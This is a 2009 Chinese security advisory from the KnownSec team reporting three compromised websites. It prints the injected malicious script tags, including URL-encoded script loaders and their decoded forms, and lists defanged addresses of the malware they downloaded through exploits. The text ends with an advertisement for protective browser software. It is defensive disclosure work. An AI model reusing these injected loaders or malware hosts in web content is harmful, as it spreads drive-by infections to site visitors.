发布时间:Thu Jan 29 2009 22:35:26 UTC+0800
最后更新时间:Thu Jan 29 2009 22:35:26 UTC+0800
________________________________________
知道创宇安全团队(KnownSec team)于今天捕获以下网站被植入恶意代码:深圳市芭蕾数码科技有限公司、传媒中国、绍兴房产网、
深圳市芭蕾数码科技有限公司(hxxp://qs-ballet.com/)多处被植入恶意代码:
<script src=hxxp://%68%68%6A%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script>
恶意链接地址解密后为:
<script src=hxxp://hhj7.cn></script><script src=hxxp://vvk7.cn></script>
通过漏洞攻击,最终下载病毒:
hxxp://d.weixk.com/new/a1.css
hxxp://d.oixka.com/new/a1.css
传媒中国(hxxp://www.cm958.cn/ad/200708/1.js)底部被植入恶意代码:
document.writeln(”<script src=http:\/\/%61%64%2E%61%6C%69%6D%61%6D%61%63%63%2E%63%6E\/%61%64%5F%30%30%32%31%31%2E%6A%73><\/script>”);
恶意链接地址解密后为:
hxxp://ad.alimamacc.cn/ad_00211.js
通过漏洞攻击,最终下载病毒:
hxxp://qq.18i16.net/exe1/b09.css
hxxp://qq.18i16.net/exe1/lzz.css
hxxp://qq.18i16.net/exe1/bf.css
hxxp://qq.18i16.net/exe1/re.css
hxxp://qq.18i16.net/exe1/real11.css
hxxp://qq.18i16.net/Baidu.cab
hxxp://121.12.173.218/exe1/cx.css
绍兴房产网(hxxp://www.0575fcw.cn/)被植入恶意代码:
<script src=hxxp://www.hon520.cn/images/xx.gif></script>
通过漏洞攻击,最终下载病毒:
hxxp://d.weixk.com/new/a1.css
hxxp://d.oixka.com/new/a1.css
推荐的应对方法: 安装365门神软件,对IE浏览器在打开网站的时候进行保护,拦截来自网络带有恶意代码的网页攻击。使用帮助和下载:http://365menshen.com
Popularity: 10% [?]
